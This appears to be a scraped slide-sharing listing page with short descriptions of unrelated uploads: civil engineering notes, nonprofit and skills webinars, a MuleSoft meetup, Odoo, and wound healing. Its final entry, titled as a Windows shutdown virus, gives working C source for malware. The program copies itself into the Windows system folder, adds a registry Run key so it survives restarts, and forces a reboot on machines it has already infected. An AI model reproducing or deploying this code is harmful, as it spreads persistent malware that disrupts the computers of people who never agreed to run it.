Surveying: Object Principles & Types of Surveying; Site Plans, Plans & Maps; Scales & Unit of different Measurements.
Linear Measurements: Instruments used. Linear Measurement by Tape, Ranging out Survey Lines and overcoming Obstructions; Measurements on sloping ground; Tape corrections, conventional symbols. Angular Measurements: Instruments used; Introduction to Compass Surveying, Bearings and Longitude & Latitude of a Line, Introduction to total station.
Levelling: Instrument used Object of levelling, Methods of levelling in brief, and Contour maps.
Chapter 4
Buildings: Selection of site for Buildings, Layout of Building Plan, Types of buildings, Plinth area, carpet area, floor space index, Introduction to building byelaws, concept of sun light & ventilation. Components of Buildings & their functions, Basic concept of R.C.C., Introduction to types of foundation
Chapter 5
Transportation: Introduction to Transportation Engineering; Traffic and Road Safety: Types and Characteristics of Various Modes of Transportation; Various Road Traffic Signs, Causes of Accidents and Road Safety Measures.
Chapter 6
Environmental Engineering: Environmental Pollution, Environmental Acts and Regulations, Functional Concepts of Ecology, Basics of Species, Biodiversity, Ecosystem, Hydrological Cycle; Chemical Cycles: Carbon, Nitrogen & Phosphorus; Energy Flow in Ecosystems.
Water Pollution: Water Quality standards, Introduction to Treatment & Disposal of Waste Water. Reuse and Saving of Water, Rain Water Harvesting. Solid Waste Management: Classification of Solid Waste, Collection, Transportation and Disposal of Solid. Recycling of Solid Waste: Energy Recovery, Sanitary Landfill, On-Site Sanitation. Air & Noise Pollution: Primary and Secondary air pollutants, Harmful effects of Air Pollution, Control of Air Pollution. . Noise Pollution Harmful Effects of noise pollution, control of noise pollution, Global warming & Climate Change, Ozone depletion, Greenhouse effect
Text Books:
1. Palancharmy, Basic Civil Engineering, McGraw Hill publishers.
2. Satheesh Gopi, Basic Civil Engineering, Pearson Publishers.
3. Ketki Rangwala Dalal, Essentials of Civil Engineering, Charotar Publishing House.
4. BCP, Surveying volume 1
Constructing Your Course Container for Effective Communication
Communicating effectively and consistently with students can help them feel at ease during their learning experience and provide the instructor with a communication trail to track the course's progress. This workshop will take you through constructing an engaging course container to facilitate effective communication.
Walmart Business+ and Spark Good for Nonprofits.pdf
"Learn about all the ways Walmart supports nonprofit organizations.
You will hear from Liz Willett, the Head of Nonprofits, and hear about what Walmart is doing to help nonprofits, including Walmart Business and Spark Good. Walmart Business+ is a new offer for nonprofits that offers discounts and also streamlines nonprofits order and expense tracking, saving time and money.
The webinar may also give some examples on how nonprofits can best leverage Walmart Business+.
The event will cover the following::
Walmart Business + (https://business.walmart.com/plus) is a new shopping experience for nonprofits, schools, and local business customers that connects an exclusive online shopping experience to stores. Benefits include free delivery and shipping, a 'Spend Analytics” feature, special discounts, deals and tax-exempt shopping.
Special TechSoup offer for a free 180 days membership, and up to $150 in discounts on eligible orders.
Spark Good (walmart.com/sparkgood) is a charitable platform that enables nonprofits to receive donations directly from customers and associates.
Answers about how you can do more with Walmart!"
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Iván Bornacelly, Policy Analyst at the OECD Centre for Skills, OECD, presents at the webinar 'Tackling job market gaps with a skills-first approach' on 12 June 2024
Advanced Java[Extra Concepts, Not Difficult].docx
This is part 2 of my Java Learning Journey. This contains Hashing, ArrayList, LinkedList, Date and Time Classes, Calendar Class and more.
The History of Stoke Newington Street Names
Presented at the Stoke Newington Literary Festival on 9th June 2024
www.StokeNewingtonHistory.com
clinical examination of hip joint (1).pdf
described clinical examination all orthopeadic conditions .
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Aberdeen
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...Nguyen Thanh Tu Collection
https://app.box.com/s/qhtvq32h4ybf9t49ku85x0n3xl4jhr15Solutons Maths Escape Room Spatial .pptx
Solutions of Puzzles of Mathematics Escape Room Game in Spatial.io
Mule event processing models | MuleSoft Mysore Meetup #47
Mule event processing models | MuleSoft Mysore Meetup #47
Event Link:- https://meetups.mulesoft.com/events/details/mulesoft-mysore-presents-mule-event-processing-models/
Agenda
● What is event processing in MuleSoft?
● Types of event processing models in Mule 4
● Distinction between the reactive, parallel, blocking & non-blocking processing
For Upcoming Meetups Join Mysore Meetup Group - https://meetups.mulesoft.com/mysore/YouTube:- youtube.com/@mulesoftmysore
Mysore WhatsApp group:- https://chat.whatsapp.com/EhqtHtCC75vCAX7gaO842N
Speaker:-
Shivani Yasaswi - https://www.linkedin.com/in/shivaniyasaswi/
Organizers:-
Shubham Chaurasia - https://www.linkedin.com/in/shubhamchaurasia1/
Giridhar Meka - https://www.linkedin.com/in/giridharmeka
Priya Shaw - https://www.linkedin.com/in/priya-shaw
How to Make a Field Mandatory in Odoo 17
In Odoo, making a field required can be done through both Python code and XML views. When you set the required attribute to True in Python code, it makes the field required across all views where it's used. Conversely, when you set the required attribute in XML views, it makes the field required only in the context of that particular view.
Wound healing PPT
This document provides an overview of wound healing, its functions, stages, mechanisms, factors affecting it, and complications.
A wound is a break in the integrity of the skin or tissues, which may be associated with disruption of the structure and function.
Healing is the body’s response to injury in an attempt to restore normal structure and functions.
Healing can occur in two ways: Regeneration and Repair
There are 4 phases of wound healing: hemostasis, inflammation, proliferation, and remodeling. This document also describes the mechanism of wound healing. Factors that affect healing include infection, uncontrolled diabetes, poor nutrition, age, anemia, the presence of foreign bodies, etc.
Complications of wound healing like infection, hyperpigmentation of scar, contractures, and keloid formation.
Recently uploaded (20)
Leveraging Generative AI to Drive Nonprofit Innovation
Leveraging Generative AI to Drive Nonprofit Innovation
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Constructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective Communication
Walmart Business+ and Spark Good for Nonprofits.pdf
Walmart Business+ and Spark Good for Nonprofits.pdf
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
Mule event processing models | MuleSoft Mysore Meetup #47
Mule event processing models | MuleSoft Mysore Meetup #47
Liberal Approach to the Study of Indian Politics.pdf
Liberal Approach to the Study of Indian Politics.pdf
spot a liar (Haiqa 146).pptx Technical writhing and presentation skills
spot a liar (Haiqa 146).pptx Technical writhing and presentation skills
NEWSPAPERS - QUESTION 1 - REVISION POWERPOINT.pptx
NEWSPAPERS - QUESTION 1 - REVISION POWERPOINT.pptx
Windows shutdown virus source code c++
- 1. #include<stdio.h> #include<dos.h> #include<dir.h> int found,drive_no;char buff[128]; void findroot() { int done; struct ffblk ffblk; //File block structure done=findfirst(“C:windowssystem“,&ffblk,FA_DIREC); //to determine the root drive if(done==0) { done=findfirst(“C:windowssystemsysres.exe“,&ffblk,0); //to determine whether the virus is already installed or not if(done==0) { found=1; //means that the system is already infected return; } drive_no=1; return; } done=findfirst(“D:windowssystem“,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“D:windowssystemsysres.exe“,&ffblk,0); if (done==0) { found=1;return; } drive_no=2; return; } done=findfirst(“E:windowssystem“,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“E:windowssystemsysres.exe“,&ffblk,0); if(done==0) { found=1; return; } drive_no=3; return; } done=findfirst(“F:windowssystem“,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“F:windowssystemsysres.exe“,&ffblk,0); if(done==0) { found=1; return; } drive_no=4; return; } else exit(0); } void main() { FILE *self,*target; findroot();
- 2. if(found==0) //if the system is not already infected { self=fopen(_argv[0],”rb”); //The virus file open”s itself switch(drive_no) { case 1: target=fopen(”C:windowssystemsysres.exe”,”wb”); //to place a copy of itself in a remote place system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun /v sres /t REG_SZ /d C:windowssystem sysres.exe”); //put this file to registry for starup break; case 2: target=fopen(”D:windowssystemsysres.exe”,”wb”); system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun /v sres /t REG_SZ /d D:windowssystemsysres.exe”); break; case 3: target=fopen(”E:windowssystemsysres.exe”,”wb”); system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun /v sres /t REG_SZ /d E:windowssystemsysres.exe”); break; case 4: target=fopen(”F:windowssystemsysres.exe”,”wb”); system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun /v sres /t REG_SZ /d F:windowssystemsysres.exe”); break; default: exit(0); } while(fread(buff,1,1,self)>0) fwrite(buff,1,1,target); fcloseall(); } else system(”shutdown -r -t 0?); //if the system is already infected then just give a command to restart }